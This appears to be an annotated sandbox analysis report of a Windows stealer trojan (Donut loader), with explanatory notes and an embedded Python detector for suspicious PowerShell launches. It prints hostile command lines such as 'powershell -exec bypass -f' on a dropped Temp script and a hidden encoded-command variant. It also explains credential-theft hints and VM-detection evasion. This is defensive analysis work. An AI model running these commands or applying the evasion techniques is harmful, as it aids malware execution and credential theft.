              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49752 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49773 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.21.60.241:443 -> 192.168.2.4:49859 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.4:49865 version: TLS 1.2

              System Summary

              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00719601
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_007194E8
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_007193EA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_007193CA
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_007193BE
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0074460E
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00739EEB
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00709464
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0070B1A1
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Static PE information: invalid certificate
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000000.1713251005.000000000046A000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1845092630.0000000002A6B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Binary or memory string: OriginalFilenametl_bench_cd.exe: vs #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 00000000.00000002.2476446512.0000000002460000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/4@2/2
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | File created: C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.2017544546.000000000375B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe, 00000000.00000003.1885801313.0000000003776000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | String found in binary or memory: /Address family not supported by protocol family
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | File read: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
              Source: unknown | Process created: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe "C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe"
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"Jump to behavior
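The process chain above is the kind of event a detection engineer wants to match without being fooled by PowerShell's abbreviated switches. The following Python is an added example, not code from the sample, from Joe Sandbox or from the Sigma rules the report cites: it approximates PowerShell's prefix resolution for its command-line switches (the PS_SWITCHES and PS_ALIASES tables are this example's assumption of that behaviour), normalises a command line, and tags the traits seen here: an execution-policy override, a -File argument under a Temp folder, an encoded command, a hidden window and a parent running from the user profile. The sample events are constructed in Sysmon-style fields; the first reproduces this page's command line with the launcher renamed to sample.exe.

```python
import ntpath
import re

# Windows PowerShell resolves a switch from any unambiguous prefix of its name
# and also honours a few fixed short forms (-e / -ec for -EncodedCommand, -ep for
# -ExecutionPolicy, -f for -File). The tables below approximate that behaviour;
# they are an assumption of this example, not the host's own parser.
PS_SWITCHES = {            # canonical name -> shortest prefix the host accepts
    "executionpolicy": "ex",
    "encodedcommand": "e",
    "command": "c",
    "file": "f",
    "noprofile": "nop",
    "noninteractive": "noni",
    "nologo": "nol",
    "noexit": "noe",
    "windowstyle": "w",
}
PS_ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}  # not prefixes

TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line, keeping a quoted path as one token."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def canonical_switch(token):
    """'-exec', '-ExecutionPolicy' and '-ep' all map to 'executionpolicy'."""
    if not token.startswith("-"):
        return None
    key = token[1:].lower()
    if key in PS_ALIASES:
        return PS_ALIASES[key]
    hits = [name for name, short in PS_SWITCHES.items()
            if name.startswith(key) and key.startswith(short)]
    return hits[0] if len(hits) == 1 else None   # None when ambiguous or unknown


def is_temp_path(path):
    p = path.lower().replace("/", "\\")
    return "\\appdata\\local\\temp\\" in p or "\\windows\\temp\\" in p


def assess_powershell_launch(parent_image, image, cmdline):
    """Tag the suspicious traits of one process-creation event."""
    tags = []
    if ntpath.basename(image).lower() not in ("powershell.exe", "pwsh.exe"):
        return tags
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks):
        sw = canonical_switch(tok)
        nxt = toks[i + 1].lower() if i + 1 < len(toks) else ""
        if sw == "executionpolicy" and nxt in ("bypass", "unrestricted"):
            tags.append("exec-policy-bypass")
        elif sw == "file" and is_temp_path(nxt):
            tags.append("script-from-temp")
        elif sw == "encodedcommand":
            tags.append("encoded-command")
        elif sw == "windowstyle" and nxt == "hidden":
            tags.append("hidden-window")
    if parent_image.lower().startswith("c:\\users\\"):
        tags.append("user-profile-parent")   # launched by a user-writable binary
    return tags


# Constructed process-creation records in Sysmon-style fields. The first one
# reproduces the chain reported on this page (launcher renamed to sample.exe);
# the second is a benign maintenance script started by a service; the third is
# a variant that uses the short switch forms.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\sample.exe",
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\MVYET7Q4Z4FMOQW2PUNL.ps1"'},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Program Files\Vendor\maint.ps1"'},
    {"ParentImage": r"C:\Users\user\AppData\Roaming\update.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -w hidden -ep bypass -e SQBFAFgA"},
]


def triage(events):
    """Return [(command line, tags)] for every event, benign ones with []."""
    return [(e["CommandLine"],
             assess_powershell_launch(e["ParentImage"], e["Image"], e["CommandLine"]))
            for e in events]


if __name__ == "__main__":
    for cmd, tags in triage(SAMPLE_EVENTS):
        print(cmd, "->", tags or "clean")
```

Normalising before matching is the point: a rule that looks for the literal "-ExecutionPolicy Bypass" misses "-exec bypass" and "-ep bypass", while a rule that only looks for the substring "bypass" fires on unrelated command lines. Feed the function real Sysmon event ID 1 or Windows 4688 records with the same three fields.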
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Section loaded: version.dll
Note: read as groups, the loads in the native executable tell the story. mscoree.dll followed by amsi.dll and wldp.dll is the CLR being started in-process and asked to load an assembly from memory (the runtime hands such assemblies to AMSI and to Windows Lockdown Policy), which is how a Donut-packed managed payload runs. winhttp.dll, webio.dll, schannel.dll, ncrypt.dll and ncryptsslp.dll are the WinHTTP-over-TLS stack the C2 traffic goes through; wbemcomn.dll is the WMI client behind the Win32_VideoController, Win32_BIOS and AntiVirusProduct queries in the evasion section; windows.storage.dll backs the known-folder lookups behind the %appdata% and %localappdata% wallet paths. dpapi.dll implements CryptUnprotectData, which a stealer needs to unwrap the DPAPI-protected key that guards Chrome's saved passwords, although the TLS key-storage provider can pull it in as well. ondemandconnroutehelper.dll was recorded a further eight times; the repeats are omitted here.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Note: for powershell.exe these loads are mostly the script host's own machinery: amsi.dll and wldp.dll are its AMSI and Windows Lockdown Policy hooks, and msisip.dll, wshext.dll, appxsip.dll and opcservices.dll are Authenticode subject-interface packages pulled in when the host checks a file's signature. mscorrc.dll is the CLR's resource library and is usually opened when the runtime formats an error or informational message. The page does not show the dropped script, so what it does with these facilities has to be read from the .ps1 itself.
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Static file information: file size 79325044 bytes > 1048576
Source: #Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Static PE information: raw size of .rsrc (0x136e00) is bigger than 0x100000
Note: the file is about 79 MB, far more than the roughly 1.2 MB .rsrc section accounts for, so most of the bulk sits elsewhere in the image or in an overlay (not shown on this page). Inflating a sample past the upload limits of AV consoles and sandboxes is a common evasion; the report's own threshold for flagging size is 1 MiB.
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0071C57E push edi; retf 0_3_0071C591
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0071CB06 push edi; retf 0_3_0071CB08
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0071FFB8 push esi; retf 0_3_0071FFBB
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00719C9D push FFFFFFC3h; ret 0_3_00719C9F
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0071AF8C push A8007176h; ret 0_3_0071AF91
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00756B35 push eax; ret 0_3_00756B39
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0073C061 push edx; retf 0_3_0073C064
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0073BB6D push edi; retf 0_3_0073BB6E
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00737BD7 pushad; retf 0020h 0_3_00737BDA
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0070EB71 push eax; iretd 0_3_0070EB72
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0070CA03 push 00000078h; retf 0_3_0070CA05
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0070CEF7 push ds; retf 0_3_0070CEF8
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_0070C7B7 push cs; iretd 0_3_0070C7B8
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Code function: 0_3_00746359 push 3C477A73h; iretd 0_3_0074635E
Note: each of these entries appeared two or three times in the raw report; the repeats are dropped. The push/retf, push/iretd and pushad/retf pairs in the 0x0070xxxx to 0x0075xxxx range are what a linear disassembler produces when it walks packed or encrypted bytes, not deliberate gadgets: retf and iretd never appear in ordinary user-mode compiler output. They identify that region as data the sample decodes at run time, which is why the report counts them toward obfuscation, and they are not useful as code-level indicators.
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Note: watching the AuthRoot keys is CryptoAPI's root-certificate auto-update logic, triggered when crypt32 builds the certificate chain for the TLS connection; it is a side effect of the HTTPS C2 traffic, not a persistence or tampering action by the sample.
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Note: NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which suppresses the "file not found" dialog the loader would otherwise show. The CLR and the PowerShell host set it routinely (the raw report recorded it 70 times for powershell.exe; the repeats are omitted here), so it is noise rather than a signal.

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | System information queried: FirmwareTableInformation
Note: Win32_VideoController exposes the display adapter name, and names such as VMware SVGA 3D, VirtualBox Graphics Adapter or Microsoft Hyper-V Video give a guest away. FirmwareTableInformation is NtQuerySystemInformation(SystemFirmwareTableInformation), the call behind GetSystemFirmwareTable: it returns the raw SMBIOS ('RSMB') or ACPI tables, whose vendor strings (innotek GmbH, VMware, QEMU and the like) survive even when the registry copies of the same data have been spoofed.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2102
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe TID: 7560 | Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8076 | Thread sleep count: 2102 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064 | Thread sleep count: 309 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8096 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
